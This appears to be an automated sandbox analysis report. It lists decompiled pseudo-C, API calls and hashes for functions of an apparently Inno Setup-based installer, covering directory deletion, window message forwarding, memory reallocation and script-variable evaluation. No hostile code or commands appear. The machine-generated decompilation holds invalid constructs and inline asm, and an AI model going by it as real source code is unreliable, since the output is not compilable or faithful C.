                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: CloseErrorFindLast
                                                            • String ID: Deleting directory: %s$Failed to delete directory (%d).$Failed to delete directory (%d). Will delete on restart (if empty).$Failed to delete directory (%d). Will retry later.$Failed to strip read-only attribute.$Not stripping read-only attribute because the directory does not appear to be empty.$Stripped read-only attribute.
                                                            • API String ID: 754982922-1448842058
                                                            • Opcode ID: 7fc0813c7db3ed8f80165e3b8539aa30754377e7929e0533272f97a4bbcf9ceb
                                                            • Instruction ID: bb024c1df45f9af0c8d848e5c22ededdbf4d41f71593f538bf5593c1374477db
                                                            • Opcode Fuzzy Hash: 7fc0813c7db3ed8f80165e3b8539aa30754377e7929e0533272f97a4bbcf9ceb
                                                            • Instruction Fuzzy Hash: B5410330A11A285ECB00EB68DD053EE77E7AF84310F11842EB411D3382CFB48E45CBA6
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 005B8390, Relevance: 12.1, APIs: 8, Instructions: 99windowthreadCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E005B8390(void* __eax, struct HWND__** __edx) {
				long _v20;
				intOrPtr _t17;
				intOrPtr _t30;
				void* _t46;
				void* _t50;
				struct HWND__** _t51;
				struct HWND__* _t52;
				struct HWND__* _t53;
				void* _t54;
				DWORD* _t55;

				_t55 = _t54 + 0xfffffff8;
				_t51 = __edx;
				_t50 = __eax;
				_t46 = 0;
				_t17 =  *((intOrPtr*)(__edx + 4));
				if(_t17 < 0x100 || _t17 > 0x109) {
					L19:
					return _t46;
				} else {
					_t52 = GetCapture();
					if(_t52 != 0) {
						GetWindowThreadProcessId(_t52, _t55);
						GetWindowThreadProcessId( *(_t50 + 0x188),  &_v20);
						if( *_t55 == _v20 && SendMessageW(_t52, _t51[1] + 0xbc00, _t51[2], _t51[3]) != 0) {
							_t46 = 1;
						}
						goto L19;
					}
					_t53 =  *_t51;
					_t30 =  *((intOrPtr*)(_t50 + 0x58));
					if(_t30 == 0 || _t53 !=  *((intOrPtr*)(_t30 + 0x3c4))) {
						L7:
						if(E0050E9B4(_t53) == 0 && _t53 != 0) {
							_t53 = GetParent(_t53);
							goto L7;
						}
						if(_t53 == 0) {
							_t53 =  *_t51;
						}
						goto L11;
					} else {
						_t53 = E0051B414(_t30);
						L11:
						if(IsWindowUnicode(_t53) == 0) {
							if(SendMessageA(_t53, _t51[1] + 0xbc00, _t51[2], _t51[3]) != 0) {
								_t46 = 1;
							}
						} else {
							if(SendMessageW(_t53, _t51[1] + 0xbc00, _t51[2], _t51[3]) != 0) {
								_t46 = 1;
							}
						}
						goto L19;
					}
				}
			}













                                                            0x005b8394
                                                            0x005b8397
                                                            0x005b8399
                                                            0x005b839b
                                                            0x005b839d
                                                            0x005b83a5
                                                            0x005b847e
                                                            0x005b8486
                                                            0x005b83b6
                                                            0x005b83bb
                                                            0x005b83bf
                                                            0x005b8442
                                                            0x005b8453
                                                            0x005b845f
                                                            0x005b847c
                                                            0x005b847c
                                                            0x00000000
                                                            0x005b845f
                                                            0x005b83c1
                                                            0x005b83c3
                                                            0x005b83c8
                                                            0x005b83e3
                                                            0x005b83ec
                                                            0x005b83e1
                                                            0x00000000
                                                            0x005b83e1
                                                            0x005b83f4
                                                            0x005b83f6
                                                            0x005b83f6
                                                            0x00000000
                                                            0x005b83d2
                                                            0x005b83d7
                                                            0x005b83f8
                                                            0x005b8400
                                                            0x005b843a
                                                            0x005b843c
                                                            0x005b843c
                                                            0x005b8402
                                                            0x005b841b
                                                            0x005b841d
                                                            0x005b841d
                                                            0x005b841b
                                                            0x00000000
                                                            0x005b8400
                                                            0x005b83c8

                                                            APIs
                                                            • GetCapture.USER32 ref: 005B83B6
                                                            • IsWindowUnicode.USER32(00000000), ref: 005B83F9
                                                            • SendMessageW.USER32(00000000,-0000BBEE,00000000,00000000), ref: 005B8414
                                                            • SendMessageA.USER32(00000000,-0000BBEE,00000000,00000000), ref: 005B8433
                                                            • GetWindowThreadProcessId.USER32(00000000), ref: 005B8442
                                                            • GetWindowThreadProcessId.USER32(?,?), ref: 005B8453
                                                            • SendMessageW.USER32(00000000,-0000BBEE,00000000,00000000), ref: 005B8473
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: MessageSendWindow$ProcessThread$CaptureUnicode
                                                            • String ID:
                                                            • API String ID: 1994056952-0
                                                            • Opcode ID: 60d5d18c6536e8f3e7333ea3e87ccb02092badd8fb76314d68d3832b537e943d
                                                            • Instruction ID: fa2d834c3aada0f77e9407d785ac3e39b975c7e98aa55159218471e4f58a832a
                                                            • Opcode Fuzzy Hash: 60d5d18c6536e8f3e7333ea3e87ccb02092badd8fb76314d68d3832b537e943d
                                                            • Instruction Fuzzy Hash: 3C21BFB520460A6F9A60EA99CD40EE777DCFF44744B105829B999C3642DE14F840C765
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00405F80, Relevance: 10.9, APIs: 7, Instructions: 406COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 88%
                                                            			E00405F80(signed int __eax, intOrPtr __edx, void* __edi) {
				signed int __ebx;
				void* __esi;
				signed int _t69;
				signed int _t78;
				signed int _t93;
				long _t94;
				void* _t100;
				signed int _t102;
				signed int _t109;
				signed int _t115;
				signed int _t123;
				signed int _t129;
				void* _t131;
				signed int _t140;
				unsigned int _t148;
				signed int _t150;
				long _t152;
				signed int _t156;
				intOrPtr _t161;
				signed int _t166;
				signed int _t170;
				unsigned int _t171;
				intOrPtr _t174;
				intOrPtr _t192;
				signed int _t195;
				signed int _t196;
				signed int _t197;
				void* _t205;
				unsigned int _t207;
				intOrPtr _t213;
				void* _t225;
				intOrPtr _t227;
				void* _t228;
				signed int _t230;
				void* _t232;
				signed int _t233;
				signed int _t234;
				signed int _t238;
				signed int _t241;
				void* _t243;
				intOrPtr* _t244;

				_t176 = __edx;
				_t66 = __eax;
				_t166 =  *(__eax - 4);
				_t217 = __eax;
				if((_t166 & 0x00000007) != 0) {
					__eflags = _t166 & 0x00000005;
					if((_t166 & 0x00000005) != 0) {
						_pop(_t217);
						_pop(_t145);
						__eflags = _t166 & 0x00000003;
						if((_t166 & 0x00000003) == 0) {
							_push(_t145);
							_push(__eax);
							_push(__edi);
							_push(_t225);
							_t244 = _t243 + 0xffffffe0;
							_t218 = __edx;
							_t202 = __eax;
							_t69 =  *(__eax - 4);
							_t148 = (0xfffffff0 & _t69) - 0x14;
							if(0xfffffff0 >= __edx) {
								__eflags = __edx - _t148 >> 1;
								if(__edx < _t148 >> 1) {
									_t150 = E00405A04(__edx);
									__eflags = _t150;
									if(_t150 != 0) {
										__eflags = _t218 - 0x40a2c;
										if(_t218 > 0x40a2c) {
											_t78 = _t202 - 0x10;
											__eflags = _t78;
											 *((intOrPtr*)(_t78 + 8)) = _t218;
										}
										E004055C0(_t202, _t218, _t150);
										E00405D88(_t202, _t202, _t225);
									}
								} else {
									_t150 = __eax;
									 *((intOrPtr*)(__eax - 0x10 + 8)) = __edx;
								}
							} else {
								if(0xfffffff0 <= __edx) {
									_t227 = __edx;
								} else {
									_t227 = 0xbadb9d;
								}
								 *_t244 = _t202 - 0x10 + (_t69 & 0xfffffff0);
								VirtualQuery( *(_t244 + 8), _t244 + 8, 0x1c);
								if( *((intOrPtr*)(_t244 + 0x14)) != 0x10000) {
									L12:
									_t150 = E00405A04(_t227);
									__eflags = _t150;
									if(_t150 != 0) {
										__eflags = _t227 - 0x40a2c;
										if(_t227 > 0x40a2c) {
											_t93 = _t150 - 0x10;
											__eflags = _t93;
											 *((intOrPtr*)(_t93 + 8)) = _t218;
										}
										E00405590(_t202,  *((intOrPtr*)(_t202 - 0x10 + 8)), _t150);
										E00405D88(_t202, _t202, _t227);
									}
								} else {
									 *(_t244 + 0x10) =  *(_t244 + 0x10) & 0xffff0000;
									_t94 =  *(_t244 + 0x10);
									if(_t218 - _t148 >= _t94) {
										goto L12;
									} else {
										_t152 = _t227 - _t148 + 0x00010000 - 0x00000001 & 0xffff0000;
										if(_t94 < _t152) {
											_t152 = _t94;
										}
										if(VirtualAlloc( *(_t244 + 0xc), _t152, 0x2000, 4) == 0 || VirtualAlloc( *(_t244 + 0xc), _t152, 0x1000, 4) == 0) {
											goto L12;
										} else {
											_t100 = _t202 - 0x10;
											 *((intOrPtr*)(_t100 + 8)) = _t218;
											 *(_t100 + 0xc) = _t152 +  *(_t100 + 0xc) | 0x00000008;
											_t150 = _t202;
										}
									}
								}
							}
							return _t150;
						} else {
							__eflags = 0;
							return 0;
						}
					} else {
						_t170 = _t166 & 0xfffffff0;
						_push(__edi);
						_t205 = _t170 + __eax;
						_t171 = _t170 - 4;
						_t156 = _t166 & 0x0000000f;
						__eflags = __edx - _t171;
						_push(_t225);
						if(__edx > _t171) {
							_t102 =  *(_t205 - 4);
							__eflags = _t102 & 0x00000001;
							if((_t102 & 0x00000001) == 0) {
								L75:
								asm("adc edi, 0xffffffff");
								_t228 = ((_t171 >> 0x00000002) + _t171 - _t176 & 0) + _t176;
								_t207 = _t171;
								_t109 = E00405A04(((_t171 >> 0x00000002) + _t171 - _t176 & 0) + _t176);
								_t192 = _t176;
								__eflags = _t109;
								if(_t109 == 0) {
									goto L73;
								} else {
									__eflags = _t228 - 0x40a2c;
									if(_t228 > 0x40a2c) {
										 *((intOrPtr*)(_t109 - 8)) = _t192;
									}
									_t230 = _t109;
									E00405590(_t217, _t207, _t109);
									E00405D88(_t217, _t207, _t230);
									return _t230;
								}
							} else {
								_t115 = _t102 & 0xfffffff0;
								_t232 = _t171 + _t115;
								__eflags = __edx - _t232;
								if(__edx > _t232) {
									goto L75;
								} else {
									__eflags =  *0x6cf05d;
									if(__eflags == 0) {
										L66:
										__eflags = _t115 - 0xb30;
										if(_t115 >= 0xb30) {
											E004055DC(_t205);
											_t176 = _t176;
											_t171 = _t171;
										}
										asm("adc edi, 0xffffffff");
										_t123 = (_t176 + ((_t171 >> 0x00000002) + _t171 - _t176 & 0) + 0x000000d3 & 0xffffff00) + 0x30;
										_t195 = _t232 + 4 - _t123;
										__eflags = _t195;
										if(_t195 > 0) {
											 *(_t217 + _t232 - 4) = _t195;
											 *((intOrPtr*)(_t217 - 4 + _t123)) = _t195 + 3;
											_t233 = _t123;
											__eflags = _t195 - 0xb30;
											if(_t195 >= 0xb30) {
												__eflags = _t123 + _t217;
												E0040561C(_t123 + _t217, _t171, _t195);
											}
										} else {
											 *(_t217 + _t232) =  *(_t217 + _t232) & 0xfffffff7;
											_t233 = _t232 + 4;
										}
										_t234 = _t233 | _t156;
										__eflags = _t234;
										 *(_t217 - 4) = _t234;
										 *0x6cfaec = 0;
										_t109 = _t217;
										L73:
										return _t109;
									} else {
										while(1) {
											asm("lock cmpxchg [0x6cfaec], ah");
											if(__eflags == 0) {
												break;
											}
											asm("pause");
											__eflags =  *0x6cf98d;
											if(__eflags != 0) {
												continue;
											} else {
												Sleep(0);
												_t176 = _t176;
												_t171 = _t171;
												asm("lock cmpxchg [0x6cfaec], ah");
												if(__eflags != 0) {
													Sleep(0xa);
													_t176 = _t176;
													_t171 = _t171;
													continue;
												}
											}
											break;
										}
										_t156 = 0x0000000f &  *(_t217 - 4);
										_t129 =  *(_t205 - 4);
										__eflags = _t129 & 0x00000001;
										if((_t129 & 0x00000001) == 0) {
											L74:
											 *0x6cfaec = 0;
											goto L75;
										} else {
											_t115 = _t129 & 0xfffffff0;
											_t232 = _t171 + _t115;
											__eflags = _t176 - _t232;
											if(_t176 > _t232) {
												goto L74;
											} else {
												goto L66;
											}
										}
									}
								}
							}
						} else {
							__eflags = __edx + __edx - _t171;
							if(__edx + __edx < _t171) {
								__eflags = __edx - 0xb2c;
								if(__edx >= 0xb2c) {
									L41:
									_t32 = _t176 + 0xd3; // 0xbff
									_t238 = (_t32 & 0xffffff00) + 0x30;
									_t174 = _t171 + 4 - _t238;
									__eflags =  *0x6cf05d;
									if(__eflags != 0) {
										while(1) {
											asm("lock cmpxchg [0x6cfaec], ah");
											if(__eflags == 0) {
												break;
											}
											asm("pause");
											__eflags =  *0x6cf98d;
											if(__eflags != 0) {
												continue;
											} else {
												Sleep(0);
												_t174 = _t174;
												asm("lock cmpxchg [0x6cfaec], ah");
												if(__eflags != 0) {
													Sleep(0xa);
													_t174 = _t174;
													continue;
												}
											}
											break;
										}
										_t156 = 0x0000000f &  *(_t217 - 4);
										__eflags = 0xf;
									}
									 *(_t217 - 4) = _t156 | _t238;
									_t161 = _t174;
									_t196 =  *(_t205 - 4);
									__eflags = _t196 & 0x00000001;
									if((_t196 & 0x00000001) != 0) {
										_t131 = _t205;
										_t197 = _t196 & 0xfffffff0;
										_t161 = _t161 + _t197;
										_t205 = _t205 + _t197;
										__eflags = _t197 - 0xb30;
										if(_t197 >= 0xb30) {
											E004055DC(_t131);
										}
									} else {
										 *(_t205 - 4) = _t196 | 0x00000008;
									}
									 *((intOrPtr*)(_t205 - 8)) = _t161;
									 *((intOrPtr*)(_t217 + _t238 - 4)) = _t161 + 3;
									__eflags = _t161 - 0xb30;
									if(_t161 >= 0xb30) {
										E0040561C(_t217 + _t238, _t174, _t161);
									}
									 *0x6cfaec = 0;
									return _t217;
								} else {
									__eflags = __edx - 0x2cc;
									if(__edx < 0x2cc) {
										_t213 = __edx;
										_t140 = E00405A04(__edx);
										__eflags = _t140;
										if(_t140 != 0) {
											_t241 = _t140;
											E004055C0(_t217, _t213, _t140);
											E00405D88(_t217, _t213, _t241);
											_t140 = _t241;
										}
										return _t140;
									} else {
										_t176 = 0xb2c;
										__eflags = _t171 - 0xb2c;
										if(_t171 <= 0xb2c) {
											goto L37;
										} else {
											goto L41;
										}
									}
								}
							} else {
								L37:
								return _t66;
							}
						}
					}
				} else {
					__ebx =  *__ecx;
					__ecx =  *(__ebx + 2) & 0x0000ffff;
					__ecx = ( *(__ebx + 2) & 0x0000ffff) - 4;
					__eflags = __ecx - __edx;
					if(__ecx < __edx) {
						__ecx = __ecx + __ecx + 0x20;
						_push(__edi);
						__edi = __edx;
						__eax = 0;
						__ecx = __ecx - __edx;
						asm("adc eax, 0xffffffff");
						__eax = 0 & __ecx;
						__eax = (0 & __ecx) + __edx;
						__eax = E00405A04((0 & __ecx) + __edx);
						__eflags = __eax;
						if(__eax != 0) {
							__eflags = __edi - 0x40a2c;
							if(__edi > 0x40a2c) {
								 *(__eax - 8) = __edi;
							}
							 *(__ebx + 2) & 0x0000ffff = ( *(__ebx + 2) & 0x0000ffff) - 4;
							__eflags = ( *(__ebx + 2) & 0x0000ffff) - 4;
							__edx = __eax;
							__edi = __eax;
							 *((intOrPtr*)(__ebx + 0x1c))() = E00405D88(__esi, __edi, __ebp);
							__eax = __edi;
						}
						_pop(__edi);
						_pop(__esi);
						_pop(__ebx);
						return __eax;
					} else {
						__ebx = 0x40 + __edx * 4;
						__eflags = 0x40 + __edx * 4 - __ecx;
						if(0x40 + __edx * 4 < __ecx) {
							__ebx = __edx;
							__eax = __edx;
							__eax = E00405A04(__edx);
							__eflags = __eax;
							if(__eax != 0) {
								__ecx = __ebx;
								__edx = __eax;
								__ebx = __eax;
								__esi = E00405D88(__esi, __edi, __ebp);
								__eax = __ebx;
							}
							_pop(__esi);
							_pop(__ebx);
							return __eax;
						} else {
							_pop(__esi);
							_pop(__ebx);
							return __eax;
						}
					}
				}
			}












































                                                            0x00405f80
                                                            0x00405f80
                                                            0x00405f80
                                                            0x00405f88
                                                            0x00405f8a
                                                            0x00406018
                                                            0x0040601b
                                                            0x00406288
                                                            0x00406289
                                                            0x0040628a
                                                            0x0040628d
                                                            0x004058b8
                                                            0x004058b9
                                                            0x004058ba
                                                            0x004058bb
                                                            0x004058bc
                                                            0x004058bf
                                                            0x004058c1
                                                            0x004058c8
                                                            0x004058d1
                                                            0x004058d6
                                                            0x004059bd
                                                            0x004059bf
                                                            0x004059d2
                                                            0x004059d4
                                                            0x004059d6
                                                            0x004059d8
                                                            0x004059de
                                                            0x004059e2
                                                            0x004059e2
                                                            0x004059e5
                                                            0x004059e5
                                                            0x004059ee
                                                            0x004059f5
                                                            0x004059f5
                                                            0x004059c1
                                                            0x004059c1
                                                            0x004059c6
                                                            0x004059c6
                                                            0x004058dc
                                                            0x004058e5
                                                            0x004058eb
                                                            0x004058e7
                                                            0x004058e7
                                                            0x004058e7
                                                            0x004058f7
                                                            0x00405906
                                                            0x00405913
                                                            0x00405983
                                                            0x0040598a
                                                            0x0040598c
                                                            0x0040598e
                                                            0x00405990
                                                            0x00405996
                                                            0x0040599a
                                                            0x0040599a
                                                            0x0040599d
                                                            0x0040599d
                                                            0x004059ad
                                                            0x004059b4
                                                            0x004059b4
                                                            0x00405915
                                                            0x00405915
                                                            0x00405921
                                                            0x00405927
                                                            0x00000000
                                                            0x00405929
                                                            0x0040593a
                                                            0x0040593e
                                                            0x00405940
                                                            0x00405940
                                                            0x00405956
                                                            0x00000000
                                                            0x0040596e
                                                            0x00405970
                                                            0x00405973
                                                            0x0040597c
                                                            0x0040597f
                                                            0x0040597f
                                                            0x00405956
                                                            0x00405927
                                                            0x00405913
                                                            0x00405a03
                                                            0x00406293
                                                            0x00406293
                                                            0x00406295
                                                            0x00406295
                                                            0x00406021
                                                            0x00406023
                                                            0x00406026
                                                            0x00406027
                                                            0x0040602a
                                                            0x0040602d
                                                            0x00406030
                                                            0x00406032
                                                            0x00406033
                                                            0x00406148
                                                            0x0040614b
                                                            0x0040614d
                                                            0x00406240
                                                            0x0040624b
                                                            0x00406252
                                                            0x00406254
                                                            0x00406257
                                                            0x0040625c
                                                            0x0040625d
                                                            0x0040625f
                                                            0x00000000
                                                            0x00406261
                                                            0x00406261
                                                            0x00406267
                                                            0x00406269
                                                            0x00406269
                                                            0x0040626c
                                                            0x00406274
                                                            0x0040627b
                                                            0x00406286
                                                            0x00406286
                                                            0x00406153
                                                            0x00406153
                                                            0x00406156
                                                            0x00406159
                                                            0x0040615b
                                                            0x00000000
                                                            0x00406161
                                                            0x00406161
                                                            0x00406168
                                                            0x004061c5
                                                            0x004061c5
                                                            0x004061ca
                                                            0x004061d0
                                                            0x004061d5
                                                            0x004061d6
                                                            0x004061d6
                                                            0x004061e2
                                                            0x004061f3
                                                            0x004061f9
                                                            0x004061f9
                                                            0x004061fb
                                                            0x00406208
                                                            0x0040620f
                                                            0x00406213
                                                            0x00406215
                                                            0x0040621b
                                                            0x0040621d
                                                            0x0040621f
                                                            0x0040621f
                                                            0x004061fd
                                                            0x004061fd
                                                            0x00406201
                                                            0x00406201
                                                            0x00406224
                                                            0x00406224
                                                            0x00406226
                                                            0x00406229
                                                            0x00406230
                                                            0x00406232
                                                            0x00406236
                                                            0x0040616a
                                                            0x0040616a
                                                            0x0040616f
                                                            0x00406177
                                                            0x00000000
                                                            0x00000000
                                                            0x00406179
                                                            0x0040617b
                                                            0x00406182
                                                            0x00000000
                                                            0x00406184
                                                            0x00406188
                                                            0x0040618d
                                                            0x0040618e
                                                            0x00406194
                                                            0x0040619c
                                                            0x004061a2
                                                            0x004061a7
                                                            0x004061a8
                                                            0x00000000
                                                            0x004061a8
                                                            0x0040619c
                                                            0x00000000
                                                            0x00406182
                                                            0x004061b1
                                                            0x004061b4
                                                            0x004061b7
                                                            0x004061b9
                                                            0x00406239
                                                            0x00406239
                                                            0x00000000
                                                            0x004061bb
                                                            0x004061bb
                                                            0x004061be
                                                            0x004061c1
                                                            0x004061c3
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x004061c3
                                                            0x004061b9
                                                            0x00406168
                                                            0x0040615b
                                                            0x00406039
                                                            0x0040603c
                                                            0x0040603e
                                                            0x00406048
                                                            0x0040604e
                                                            0x00406065
                                                            0x00406065
                                                            0x00406071
                                                            0x00406077
                                                            0x00406079
                                                            0x00406080
                                                            0x00406082
                                                            0x00406087
                                                            0x0040608f
                                                            0x00000000
                                                            0x00000000
                                                            0x00406091
                                                            0x00406093
                                                            0x0040609a
                                                            0x00000000
                                                            0x0040609c
                                                            0x0040609f
                                                            0x004060a4
                                                            0x004060aa
                                                            0x004060b2
                                                            0x004060b7
                                                            0x004060bc
                                                            0x00000000
                                                            0x004060bc
                                                            0x004060b2
                                                            0x00000000
                                                            0x0040609a
                                                            0x004060c5
                                                            0x004060c5
                                                            0x004060c5
                                                            0x004060ca
                                                            0x004060cd
                                                            0x004060cf
                                                            0x004060d2
                                                            0x004060d5
                                                            0x004060e0
                                                            0x004060e2
                                                            0x004060e5
                                                            0x004060e7
                                                            0x004060e9
                                                            0x004060ef
                                                            0x004060f1
                                                            0x004060f1
                                                            0x004060d7
                                                            0x004060da
                                                            0x004060da
                                                            0x004060f6
                                                            0x004060fc
                                                            0x00406100
                                                            0x00406106
                                                            0x0040610d
                                                            0x0040610d
                                                            0x00406112
                                                            0x0040611f
                                                            0x00406050
                                                            0x00406050
                                                            0x00406056
                                                            0x00406120
                                                            0x00406124
                                                            0x00406129
                                                            0x0040612b
                                                            0x0040612d
                                                            0x00406135
                                                            0x0040613c
                                                            0x00406141
                                                            0x00406141
                                                            0x00406147
                                                            0x0040605c
                                                            0x0040605c
                                                            0x00406061
                                                            0x00406063
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00406063
                                                            0x00406056
                                                            0x00406040
                                                            0x00406040
                                                            0x00406044
                                                            0x00406044
                                                            0x0040603e
                                                            0x00406033
                                                            0x00405f90
                                                            0x00405f90
                                                            0x00405f92
                                                            0x00405f96
                                                            0x00405f99
                                                            0x00405f9b
                                                            0x00405fd4
                                                            0x00405fd8
                                                            0x00405fd9
                                                            0x00405fdb
                                                            0x00405fdd
                                                            0x00405fdf
                                                            0x00405fe2
                                                            0x00405fe4
                                                            0x00405fe6
                                                            0x00405feb
                                                            0x00405fed
                                                            0x00405fef
                                                            0x00405ff5
                                                            0x00405ff7
                                                            0x00405ff7
                                                            0x00405ffe
                                                            0x00405ffe
                                                            0x00406001
                                                            0x00406003
                                                            0x0040600c
                                                            0x00406011
                                                            0x00406011
                                                            0x00406013
                                                            0x00406014
                                                            0x00406015
                                                            0x00406016
                                                            0x00405f9d
                                                            0x00405f9d
                                                            0x00405fa4
                                                            0x00405fa6
                                                            0x00405fac
                                                            0x00405fae
                                                            0x00405fb0
                                                            0x00405fb5
                                                            0x00405fb7
                                                            0x00405fb9
                                                            0x00405fbb
                                                            0x00405fbd
                                                            0x00405fc8
                                                            0x00405fcd
                                                            0x00405fcd
                                                            0x00405fcf
                                                            0x00405fd0
                                                            0x00405fd1
                                                            0x00405fa8
                                                            0x00405fa8
                                                            0x00405fa9
                                                            0x00405faa
                                                            0x00405faa
                                                            0x00405fa6
                                                            0x00405f9b

                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 833c993916d0d18284627c8ebcb851e0d3f6b00a19ef6d1fc725f28c20042ba8
                                                            • Instruction ID: 5d66737b0d4da92f98c0db807105cf356bd4b4b1c4874a50b8b8aa415a59ee3b
                                                            • Opcode Fuzzy Hash: 833c993916d0d18284627c8ebcb851e0d3f6b00a19ef6d1fc725f28c20042ba8
                                                            • Instruction Fuzzy Hash: D1C134A2710A004BD714AB7D9C8476FB286DBC5324F19823FE645EB3D6DA7CCC558B88
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 006158C4, Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 239windowCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 62%
                                                            			E006158C4(void* __ebx, int* __edx, void* __edi, void* __esi, void* __fp0) {
				char _v8;
				char _v12;
				int* _v16;
				char _v144;
				intOrPtr _v148;
				void* _v152;
				intOrPtr _v156;
				char _v168;
				char _v172;
				void* _t51;
				intOrPtr* _t57;
				intOrPtr* _t62;
				intOrPtr* _t65;
				intOrPtr* _t71;
				intOrPtr _t77;
				void* _t104;
				void* _t107;
				int* _t108;
				struct HWND__* _t118;
				int _t122;
				intOrPtr _t152;
				intOrPtr _t156;
				intOrPtr _t157;
				intOrPtr _t162;
				struct HWND__* _t163;
				intOrPtr _t164;
				intOrPtr _t165;
				intOrPtr _t166;
				intOrPtr _t169;
				intOrPtr _t172;
				intOrPtr _t176;
				void* _t181;
				void* _t182;
				intOrPtr _t183;
				void* _t189;

				_t189 = __fp0;
				_t179 = __esi;
				_t178 = __edi;
				_t181 = _t182;
				_t183 = _t182 + 0xffffff58;
				_push(__esi);
				_push(__edi);
				_v172 = 0;
				_v8 = 0;
				_v12 = 0;
				_v16 = __edx;
				_push(_t181);
				_push(0x615c7e);
				_push( *[fs:eax]);
				 *[fs:eax] = _t183;
				_push(_t181);
				_push(0x615c40);
				_push( *[fs:edx]);
				 *[fs:edx] = _t183;
				_t122 =  *_v16;
				_t51 = _t122 - 0x4a;
				if(_t51 == 0) {
					_t53 = _v16[2];
					_t152 =  *(_v16[2]) - 0x800;
					__eflags = _t152;
					if(__eflags == 0) {
						_push(_t181);
						_push(0x615a6b);
						_push( *[fs:edx]);
						 *[fs:edx] = _t183;
						E0040A350( &_v8,  *(_t53 + 4) >> 1,  *((intOrPtr*)(_t53 + 8)), __eflags);
						_push(_t181);
						_push(0x615a29);
						_push( *[fs:eax]);
						 *[fs:eax] = _t183;
						_t57 =  *0x6cd8cc; // 0x6d681c
						 *_t57 =  *_t57 + 1;
						_push(_t181);
						_push(0x615a0e);
						_push( *[fs:eax]);
						 *[fs:eax] = _t183;
						L006ABD3C(_v8,  *(_t53 + 4) >> 1,  &_v12);
						_pop(_t156);
						 *[fs:eax] = _t156;
						_push(E00615A15);
						_t62 =  *0x6cd8cc; // 0x6d681c
						 *_t62 =  *_t62 - 1;
						__eflags =  *_t62;
						return _t62;
					} else {
						_t157 = _t152 - 1;
						__eflags = _t157;
						if(_t157 == 0) {
							_push(_t181);
							_push(0x615b61);
							_push( *[fs:edx]);
							 *[fs:edx] = _t183;
							E0040714C( *((intOrPtr*)(_t53 + 8)), _t122, 0x98,  &_v168);
							_push(_t181);
							_push(0x615b1f);
							_push( *[fs:eax]);
							 *[fs:eax] = _t183;
							_t65 =  *0x6cdb4c; // 0x6d682c
							__eflags =  *_t65;
							if( *_t65 == 0) {
								E00429008(L"Cannot evaluate variable because [Code] isn\'t running yet", 1);
								E004098C4();
							}
							E0040A998( &_v172, 0x80,  &_v144, 0);
							_t71 =  *0x6cdb4c; // 0x6d682c
							E006A3E88( *_t71, _t122, _v156, _t178, _t179, _t189,  &_v12, _v172, _v148);
							_v16[3] = 1;
							_pop(_t162);
							 *[fs:eax] = _t162;
